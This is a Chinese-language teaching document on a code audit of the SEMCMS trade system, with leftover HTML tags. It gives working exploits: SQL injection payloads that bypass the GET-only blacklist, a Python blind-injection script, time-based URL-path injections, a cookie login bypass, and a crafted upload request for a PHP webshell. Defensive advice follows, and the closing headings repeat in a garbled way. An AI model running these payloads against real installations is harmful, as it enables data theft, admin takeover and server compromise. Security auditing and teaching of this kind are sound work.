商贸系统代码审计与漏洞利用教学文档<\/h1>

1. 系统概述<\/h2>
本教学文档基于某商贸系统(SEMCMS)的代码审计结果，详细分析系统中存在的安全漏洞及利用方法。该系统存在多处安全缺陷，包括SQL注入、认证绕过和文件上传漏洞等。<\/p>

2. SQL注入漏洞分析<\/h2>

2.1 WAF机制分析<\/h3>
系统通过以下代码实现SQL注入防护：<\/p>
\/\/ 防sql注入
<\/span><\/span><\/span><\/span>if<\/span>(isset<\/span>($_GET)){ $GetArray =<\/span> $_GET;} else<\/span> { $GetArray =<\/span> ''<\/span>;} \/\/get
<\/span><\/span><\/span><\/span>foreach<\/span>($GetArray as<\/span> $value){ \/\/get
<\/span><\/span><\/span><\/span>    verify_str<\/span>($value);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>function<\/span> inject_check_sql<\/span>($sql_str) {
<\/span><\/span>    return<\/span> preg_match<\/span>('\/select|insert|=|%|<|between|update|\'|\*|union|into|load_file|outfile\/i'<\/span>, $sql_str);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>function<\/span> verify_str<\/span>($str) {
<\/span><\/span>    if<\/span>(inject_check_sql<\/span>($str)) {
<\/span><\/span>        exit<\/span>('Sorry,You do this is wrong!'<\/span>);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $str;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>WAF特点分析：<\/strong><\/p>

仅对GET参数进行过滤，POST参数未过滤<\/li>
黑名单过滤机制，正则匹配以下关键词：

select<\/code>, insert<\/code>, =<\/code>, %<\/code>, <<\/code>, between<\/code>, update<\/code><\/li>
单引号'<\/code>, 星号*<\/code>, union<\/code>, into<\/code><\/li>
load_file<\/code>, outfile<\/code><\/li>
<\/ul>
<\/li>
过滤不严格，未过滤ascii<\/code>, substr<\/code>等函数<\/li>
未过滤^<\/code>(异或)等运算符<\/li>
<\/ol>
2.2 第一处SQL注入利用<\/h3>
漏洞位置：<\/strong><\/p>
if<\/span>(isset<\/span>($_POST["languageID"<\/span>])){
<\/span><\/span>    $Language=<\/span>test_input<\/span>(verify_str<\/span>($_POST["languageID"<\/span>]));
<\/span><\/span>}else<\/span>{
<\/span><\/span>    $Language=<\/span>verify_str<\/span>($Language);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>绕过方法：<\/strong><\/p>

使用POST方法传参，绕过GET过滤<\/li>
利用未被过滤的函数和运算符构造payload<\/li>
<\/ol>
test_input函数分析：<\/strong><\/p>
function<\/span> test_input<\/span>($data) {
<\/span><\/span>    $data =<\/span> str_replace<\/span>("%"<\/span>, "percent"<\/span>, $data);
<\/span><\/span>    $data =<\/span> trim<\/span>($data);
<\/span><\/span>    $data =<\/span> stripslashes<\/span>($data);
<\/span><\/span>    $data =<\/span> htmlspecialchars<\/span>($data,ENT_QUOTES<\/span>);
<\/span><\/span>    return<\/span> $data;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
将%替换为percent<\/li>
去除两侧空白字符<\/li>
删除反斜杠<\/li>
HTML实体编码<\/li>
<\/ul>
可利用的盲注payload示例：<\/strong><\/p>
languageID=2 and ascii(substr(database(),1,1))^109
<\/code><\/pre>
自动化盲注脚本：<\/strong><\/p>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/localhost"<\/span>
<\/span><\/span>database =<\/span> ""<\/span>
<\/span><\/span>
<\/span><\/span>for<\/span> i in<\/span> range(1<\/span>,6<\/span>):
<\/span><\/span>    for<\/span> j in<\/span> range(97<\/span>,127<\/span>):
<\/span><\/span>        payload =<\/span> "1 and ascii(substr(database(),<\/span>{i}<\/span>,1))^<\/span>{j}<\/span>"<\/span>.<\/span>format(j=<\/span>j,i=<\/span>i)
<\/span><\/span>        data =<\/span> {"languageID"<\/span>:payload}
<\/span><\/span>        c =<\/span> requests.<\/span>post(url=<\/span>url,data=<\/span>data).<\/span>text
<\/span><\/span>        if<\/span> "Empty!"<\/span> in<\/span> c:
<\/span><\/span>            database +=<\/span> chr(j)
<\/span><\/span>            print(database)
<\/span><\/span><\/code><\/pre>2.3 第二处SQL注入利用<\/h3>
漏洞位置：<\/strong><\/p>
$web_urls=<\/span>$_SERVER["REQUEST_URI"<\/span>]; \/\/获取url路径
<\/span><\/span><\/span><\/span>$web_urls=<\/span>explode<\/span>("\/"<\/span>,$web_urls);
<\/span><\/span>$urlml=<\/span>web_language_ml<\/span>(@<\/span>$web_urls[1<\/span>],@<\/span>$web_urls[2<\/span>],$db_conn);
<\/span><\/span><\/code><\/pre>web_language_ml函数分析：<\/strong><\/p>
function<\/span> web_language_ml<\/span>($web_urls1,$web_urls2,$db_conn){
<\/span><\/span>    $query=<\/span>$db_conn-><\/span>query<\/span>("select * from sc_language where language_url='<\/span>$web_urls1<\/span>' or language_url='<\/span>$web_urls2<\/span>' and language_open=1"<\/span>);
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞特点：<\/strong><\/p>

直接拼接URL路径到SQL语句，未经过滤<\/li>
特殊字符在GET传参时被URL编码<\/li>
单引号未被过滤，可闭合SQL语句<\/li>
空格被处理，需使用其他方法绕过<\/li>
<\/ol>
利用方法：<\/strong><\/p>
\/index.php\/'or(sleep(3))or'
<\/code><\/pre>
完整SQL注入payload：<\/strong><\/p>
\/index.php\/1'or+if(substr((select+min(table_name)from(information_schema.tables)where+table_schema=(database())&&table_name!='sc_banner'),1,1)>'a',sleep(15),1)#
<\/code><\/pre>
3. 认证绕过漏洞<\/h2>
漏洞位置：<\/strong><\/p>
function<\/span> checkuser<\/span>($db_conn){
<\/span><\/span>    $cookieuseradmin=@<\/span>verify_str<\/span>(test_input<\/span>($_COOKIE["scuseradmin"<\/span>]));
<\/span><\/span>    $cookieuserpass=@<\/span>verify_str<\/span>(test_input<\/span>($_COOKIE["scuserpass"<\/span>]));
<\/span><\/span>    $query=<\/span>$db_conn-><\/span>query<\/span>("select * from sc_user where user_admin='<\/span>$cookieuseradmin<\/span>' and user_ps='<\/span>$cookieuserpass<\/span>'"<\/span>);
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞原理：<\/strong><\/p>

从Cookie中获取用户名和密码<\/li>
直接拼接至SQL语句，存在SQL注入<\/li>
<\/ol>
利用方法：<\/strong><\/p>

构造恶意Cookie值：

scuseradmin=111\<\/code><\/li>
scuserpass=or 1#<\/code><\/li>
<\/ul>
<\/li>
最终SQL语句：
select<\/span> *<\/span> from<\/span> sc_user where<\/span> user_admin=<\/span>'111\'<\/span> and<\/span> user_ps=<\/span>'or 1#'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4. 文件上传漏洞与Getshell<\/h2>
4.1 漏洞利用过程<\/h3>

制作包含PHP代码的图片文件<\/li>
在后台管理页面提交图片上传<\/li>
使用BurpSuite拦截修改请求<\/li>
<\/ol>
请求示例：<\/strong><\/p>
POST<\/span> \/SEMCMS3.9\/OSWttq_Admin\/SEMCMS_Upfile.php HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> localhost<\/span>
<\/span><\/span>Content-Type:<\/span> multipart\/form-data; boundary=3369516516527364944820946580<\/span>
<\/span><\/span>
<\/span><\/span>--3369516516527364944820946580
<\/span><\/span>Content-Disposition: form-data; name="wname"
<\/span><\/span>111
<\/span><\/span>--3369516516527364944820946580
<\/span><\/span>Content-Disposition: form-data; name="file"; filename="test.jpg"
<\/span><\/span>Content-Type: image\/jpeg
<\/span><\/span>
<\/span><\/span><?php phpinfo();
<\/span><\/span>--3369516516527364944820946580
<\/span><\/span>Content-Disposition: form-data; name="imageurl"
<\/span><\/span>..\/Images\/prdoucts\/
<\/span><\/span>--3369516516527364944820946580--
<\/span><\/span><\/code><\/pre>
修改重命名文件为111.jpg.php:<\/code><\/li>
第二次提交时修改上传文件名为test.jpg<<<<\/code><\/li>
<\/ol>
4.2 漏洞原理分析<\/h3>
关键代码：<\/strong><\/p>
if<\/span>(test_input<\/span>($_POST["wname"<\/span>])){ \/\/自定义文件名
<\/span><\/span><\/span><\/span>    $newname=<\/span>test_input<\/span>($_POST["wname"<\/span>]).<\/span>"."<\/span>.<\/span>end<\/span>($uptype); \/\/新的文件名
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞成因：<\/strong><\/p>

文件名命名格式处理不当<\/li>
冒号可能导致截断，使.jpg<\/code>未被正确拼接<\/li>
<<<<\/code>可能被系统特殊处理<\/li>
<\/ol>
4.3 潜在的其他Getshell点<\/h3>
Mbapp函数分析：<\/strong><\/p>
function<\/span> Mbapp<\/span>($mb,$lujin,$mblujin,$dirpaths,$htmlopen){
<\/span><\/span>    if<\/span>($htmlopen==<\/span>1<\/span>){$ml=<\/span>"j"<\/span>;}else<\/span>{$ml=<\/span>"d"<\/span>;}
<\/span><\/span>    $template=<\/span>"index.php,hta\/"<\/span>.<\/span>$ml.<\/span>"\/.htaccess"<\/span>;
<\/span><\/span>    $template_mb=<\/span>explode<\/span>(","<\/span>,$template);
<\/span><\/span>    for<\/span>($i=<\/span>0<\/span>;$i<<\/span>count<\/span>($template_mb);$i++<\/span>){
<\/span><\/span>        $template_o =<\/span> file_get_contents<\/span>($mblujin.<\/span>'Templete\/'<\/span>.<\/span>$mb.<\/span>'\/Include\/'<\/span>.<\/span>$template_mb[$i]);
<\/span><\/span>        $templateUrl =<\/span> $lujin.<\/span>str_replace<\/span>("hta\/"<\/span>.<\/span>$ml,$template_mb[$i]);
<\/span><\/span>        $output =<\/span> str_replace<\/span>('<{Template}>'<\/span>, $mb, $template_o);
<\/span><\/span>        $output =<\/span> str_replace<\/span>('<{dirpaths}>'<\/span>, $dirpaths, $output);
<\/span><\/span>        file_put_contents<\/span>($templateUrl, $output);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>潜在利用方式：<\/strong><\/p>

$mb<\/code>参数可控<\/li>
通过模板目录提取index.php和.htaccess文件<\/li>
替换<{Template}><\/code>标签后写入主目录<\/li>
可能通过控制模板内容实现代码执行<\/li>
<\/ol>
5. 防御建议<\/h2>


SQL注入防御：<\/strong><\/p>

使用预处理语句(PDO或mysqli_prepare)<\/li>
统一过滤所有输入参数(GET\/POST\/COOKIE)<\/li>
实现白名单过滤机制<\/li>
<\/ul>
<\/li>

认证安全：<\/strong><\/p>

使用密码哈希存储(如password_hash)<\/li>
实现CSRF防护<\/li>
使用Session而非Cookie存储认证状态<\/li>
<\/ul>
<\/li>

文件上传安全：<\/strong><\/p>

严格验证文件类型(MIME类型+文件头)<\/li>
重命名上传文件为随机名称<\/li>
限制上传目录的脚本执行权限<\/li>
禁止用户控制上传文件路径<\/li>
<\/ul>
<\/li>

代码安全：<\/strong><\/p>

禁用危险函数(如system, exec, passthru等)<\/li>
实现严格的输入输出过滤<\/li>
定期进行安全审计和代码审查<\/li>
<\/ul>
<\/li>
<\/ol>
6. 总结<\/h2>
本商贸系统存在多处严重安全漏洞，攻击者可利用这些漏洞实现：<\/p>

通过SQL注入获取数据库敏感信息<\/li>
绕过认证机制获得管理员权限<\/li>
上传恶意文件获取服务器控制权<\/li>
<\/ol>
开发人员应重视安全编码实践，系统管理员应及时修补这些漏洞，避免造成安全事件。<\/p>
商贸系统代码审计与漏洞利用教学文档<\/h1>

1. 系统概述<\/h2> 本教学文档基于某商贸系统(SEMCMS)的代码审计结果，详细分析系统中存在的安全漏洞及利用方法。该系统存在多处安全缺陷，包括SQL注入、认证绕过和文件上传漏洞等。<\/p>

2. SQL注入漏洞分析<\/h2>

4. 文件上传漏洞与Getshell<\/h2>

1. 系统概述<\/h2>
本教学文档基于某商贸系统(SEMCMS)的代码审计结果，详细分析系统中存在的安全漏洞及利用方法。该系统存在多处安全缺陷，包括SQL注入、认证绕过和文件上传漏洞等。<\/p>
